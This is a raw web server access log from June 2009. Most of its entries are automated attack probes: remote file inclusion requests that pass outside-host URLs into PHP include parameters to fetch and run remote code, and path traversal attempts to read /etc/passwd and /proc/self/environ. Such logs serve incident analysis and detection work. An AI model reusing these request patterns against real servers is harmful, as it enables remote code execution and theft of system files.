82.59.215.21 - - [10/Jun/2009:07:13:00 -0400] "GET /logs/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.820"
89.223.3.98 - - [10/Jun/2009:07:13:25 -0400] "GET /logs/error_log.Q109052000%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
124.217.216.86 - - [10/Jun/2009:07:15:03 -0400] "GET /logs/error_log.Q108052600%20/?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.826"
123.143.98.5 - - [10/Jun/2009:07:15:04 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:07:15:04 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:07:15:04 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:07:15:04 -0400] "GET //include/mail.inc.php?skin_board_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:07:15:06 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:07:15:07 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:07:15:07 -0400] "GET //include/mail.inc.php?skin_board_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:07:15:07 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
124.217.216.86 - - [10/Jun/2009:07:15:16 -0400] "GET /logs/error_log.Q108052600%20/?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.826"
82.59.215.21 - - [10/Jun/2009:07:15:58 -0400] "GET /logs/access_log.Q109052500/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.820"
72.36.134.234 - - [10/Jun/2009:07:16:06 -0400] "GET /logs/access_log.Q109052300//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
72.36.134.234 - - [10/Jun/2009:07:16:06 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
72.36.134.234 - - [10/Jun/2009:07:16:06 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
172.16.1.69 - - [10/Jun/2009:07:16:28 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [10/Jun/2009:07:16:28 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [10/Jun/2009:07:16:28 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
66.249.71.14 - - [10/Jun/2009:07:16:33 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [10/Jun/2009:07:16:33 -0400] "GET /logs/error_log.Q109013100 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.117.172.131 - - [10/Jun/2009:07:17:07 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jun/2009:07:17:07 -0400] "GET /logs/access_log.Q109052300//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jun/2009:07:17:07 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:07:17:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.36.134.234 - - [10/Jun/2009:07:17:46 -0400] "GET /logs/access_log.Q109052300%20%20//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
72.36.134.234 - - [10/Jun/2009:07:18:09 -0400] "GET /logs/access_log.Q109053100%20%20//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
61.250.85.200 - - [10/Jun/2009:07:18:24 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
61.250.85.200 - - [10/Jun/2009:07:18:24 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.250.85.200 - - [10/Jun/2009:07:18:24 -0400] "GET /logs/access_log.Q109052300//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jun/2009:07:19:06 -0400] "GET /logs/access_log.Q109052300%20%20//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jun/2009:07:19:26 -0400] "GET /logs/access_log.Q109053100%20%20//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
77.221.130.5 - - [10/Jun/2009:07:19:43 -0400] "GET /logs/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
77.221.130.5 - - [10/Jun/2009:07:19:43 -0400] "GET /mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
77.221.130.5 - - [10/Jun/2009:07:19:43 -0400] "GET /logs/access_log.Q109010700/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
77.221.130.5 - - [10/Jun/2009:07:19:58 -0400] "GET /logs/access_log.Q109052900/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
200.234.201.114 - - [10/Jun/2009:07:20:15 -0400] "GET /logs/access_log.Q109010700/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
200.234.201.114 - - [10/Jun/2009:07:20:15 -0400] "GET /mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
200.234.201.114 - - [10/Jun/2009:07:20:15 -0400] "GET /logs/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
200.234.201.114 - - [10/Jun/2009:07:20:21 -0400] "GET /logs/access_log.Q109052900/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:07:20:22 -0400] "GET /logs/access_log.Q109052800%20//include/mail.inc.php?skin_board_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:07:20:34 -0400] "GET /logs/access_log.Q109052800%20//include/mail.inc.php?skin_board_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
74.53.70.114 - - [10/Jun/2009:07:20:35 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.53.70.114 - - [10/Jun/2009:07:20:37 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.53.70.114 - - [10/Jun/2009:07:20:37 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
80.74.64.27 - - [10/Jun/2009:07:20:55 -0400] "GET /logs/error_log.Q108052600/?sourcedir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:07:20:55 -0400] "GET /?sourcedir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:07:20:56 -0400] "GET /logs/?sourcedir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 200 4902 "-" "libwww-perl/5.805"
74.53.70.114 - - [10/Jun/2009:07:21:03 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
66.232.143.238 - - [10/Jun/2009:07:22:04 -0400] "GET /logs/error_log.Q108052600/?sourcedir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
66.232.143.238 - - [10/Jun/2009:07:22:05 -0400] "GET /?sourcedir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
66.232.143.238 - - [10/Jun/2009:07:22:06 -0400] "GET /logs/?sourcedir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 200 4902 "-" "libwww-perl/5.805"
61.250.85.200 - - [10/Jun/2009:07:22:09 -0400] "GET /logs/access_log.Q109052300%20%20//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
61.250.85.200 - - [10/Jun/2009:07:22:25 -0400] "GET /logs/error_log.Q109052600%20%20//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:07:22:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.54.28.195 - - [10/Jun/2009:07:22:30 -0400] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
190.54.28.195 - - [10/Jun/2009:07:22:30 -0400] "GET /logs/access_log.Q109010700//admin/includes/spaw/spaw_control.class.php?spaw_root=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 268 "-" "libwww-perl/5.808"
190.54.28.195 - - [10/Jun/2009:07:22:30 -0400] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.808"
79.174.72.67 - - [10/Jun/2009:07:23:05 -0400] "GET /logs/error_log.Q108111500//index.php?option=com_custompages&cpage=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
79.174.72.67 - - [10/Jun/2009:07:23:05 -0400] "GET //index.php?option=com_custompages&cpage=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
79.174.72.67 - - [10/Jun/2009:07:23:06 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
116.125.126.72 - - [10/Jun/2009:07:23:21 -0400] "GET /postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
116.125.126.72 - - [10/Jun/2009:07:23:21 -0400] "GET /logs/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
116.125.126.72 - - [10/Jun/2009:07:23:21 -0400] "GET /logs/access_log.Q109052800/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
79.174.72.67 - - [10/Jun/2009:07:23:35 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_custompages&cpage=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
89.223.3.98 - - [10/Jun/2009:07:24:04 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:24:04 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:24:04 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:24:13 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:24:13 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:24:13 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:07:24:15 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:07:24:15 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:07:24:15 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:24:17 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:24:17 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:24:17 -0400] "GET /logs/access_log.Q109050700%20%20//admin/business_inc/saveserver.php?thisdir=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
116.125.126.72 - - [10/Jun/2009:07:24:19 -0400] "GET /logs/access_log.Q109053100/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:24:26 -0400] "GET /logs/access_log.Q109010700%20%20//admin/business_inc/saveserver.php?thisdir=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:24:28 -0400] "GET /logs/access_log.Q109010700//admin/business_inc/saveserver.php?thisdir=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jun/2009:07:24:32 -0400] "GET /logs/access_log.Q109053100//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:07:24:47 -0400] "GET /logs/access_log.Q109052600//admin/business_inc/saveserver.php?thisdir=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.234.107.233 - - [10/Jun/2009:07:25:14 -0400] "GET /logs/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
211.234.107.233 - - [10/Jun/2009:07:25:14 -0400] "GET /logs/access_log.Q109052800/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.234.107.233 - - [10/Jun/2009:07:25:14 -0400] "GET /postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.234.107.233 - - [10/Jun/2009:07:25:19 -0400] "GET /logs/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
211.234.107.233 - - [10/Jun/2009:07:25:19 -0400] "GET /logs/access_log.Q109052800/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.234.107.233 - - [10/Jun/2009:07:25:19 -0400] "GET /postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.232.143.238 - - [10/Jun/2009:07:25:24 -0400] "GET /rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
66.232.143.238 - - [10/Jun/2009:07:25:47 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
190.54.28.195 - - [10/Jun/2009:07:25:51 -0400] "GET /logs//index.php?abs_path=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
190.54.28.195 - - [10/Jun/2009:07:25:51 -0400] "GET /logs/access_log.Q109010700//index.php?abs_path=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
190.54.28.195 - - [10/Jun/2009:07:25:51 -0400] "GET //index.php?abs_path=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
211.234.107.233 - - [10/Jun/2009:07:25:55 -0400] "GET /logs/access_log.Q109053100/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.234.107.233 - - [10/Jun/2009:07:26:00 -0400] "GET /logs/access_log.Q109053100/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.132.125.167 - - [10/Jun/2009:07:27:00 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F70444892E700E7BE041+M37+ENG HTTP/1.1" 200 46495 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F704F4F72C7008E0E041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)"
209.59.12.99 - - [10/Jun/2009:07:27:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.36.134.234 - - [10/Jun/2009:07:28:22 -0400] "GET /logs/access_log.Q109053100//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.232.143.238 - - [10/Jun/2009:07:28:47 -0400] "GET /?sourcedir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
82.59.215.21 - - [10/Jun/2009:07:28:49 -0400] "GET /logs/access_log.Q109052100/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.820"
82.59.215.21 - - [10/Jun/2009:07:28:49 -0400] "GET /errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.820"
123.143.98.5 - - [10/Jun/2009:07:28:50 -0400] "GET /logs/rgboard/include/mail.inc.php?skin_board_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:07:28:50 -0400] "GET /logs/access_log.Q109051100/rgboard/include/mail.inc.php?skin_board_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:07:28:50 -0400] "GET /logs/access_log.Q109052800/rgboard/include/mail.inc.php?skin_board_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
82.59.215.21 - - [10/Jun/2009:07:28:50 -0400] "GET /logs/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.820"
123.143.98.5 - - [10/Jun/2009:07:28:50 -0400] "GET /rgboard/include/mail.inc.php?skin_board_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:07:28:51 -0400] "GET /logs/access_log.Q109052800/rgboard/include/mail.inc.php?skin_board_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:07:28:51 -0400] "GET /logs/access_log.Q109051100/rgboard/include/mail.inc.php?skin_board_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:07:28:51 -0400] "GET /logs/rgboard/include/mail.inc.php?skin_board_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:07:28:52 -0400] "GET /rgboard/include/mail.inc.php?skin_board_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
116.125.126.72 - - [10/Jun/2009:07:29:02 -0400] "GET /logs/access_log.Q109052800%20%20/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
116.125.126.72 - - [10/Jun/2009:07:29:10 -0400] "GET /logs/access_log.Q109053100%20%20/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
190.54.28.195 - - [10/Jun/2009:07:30:00 -0400] "GET /logs/access_log.Q109053100//admin/includes/spaw/spaw_control.class.php?spaw_root=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 268 "-" "libwww-perl/5.808"
172.16.1.180 - - [10/Jun/2009:07:30:05 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:30:05 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:30:05 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
190.54.28.195 - - [10/Jun/2009:07:30:36 -0400] "GET /logs/error_log.Q108062800//index.php?abs_path=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
82.59.215.21 - - [10/Jun/2009:07:30:54 -0400] "GET /logs/access_log.Q109060500//ea-gBook/index_inc.php?inc_ordner=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.820"
82.59.215.21 - - [10/Jun/2009:07:30:55 -0400] "GET //ea-gBook/index_inc.php?inc_ordner=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 221 "-" "libwww-perl/5.820"
82.59.215.21 - - [10/Jun/2009:07:30:55 -0400] "GET /logs//ea-gBook/index_inc.php?inc_ordner=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.820"
222.239.76.25 - - [10/Jun/2009:07:31:03 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:07:31:03 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:07:31:03 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.234.107.233 - - [10/Jun/2009:07:31:04 -0400] "GET /logs/access_log.Q109052800%20%20/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
123.143.98.5 - - [10/Jun/2009:07:31:09 -0400] "GET /logs/access_log.Q109051100/rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:07:31:10 -0400] "GET /rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:07:31:10 -0400] "GET /logs/rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:07:31:11 -0400] "GET /logs/access_log.Q109052800/rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:07:31:14 -0400] "GET /logs/access_log.Q109051100/rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:07:31:14 -0400] "GET /rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:07:31:15 -0400] "GET /logs/rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:07:31:15 -0400] "GET /logs/access_log.Q109052800/rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
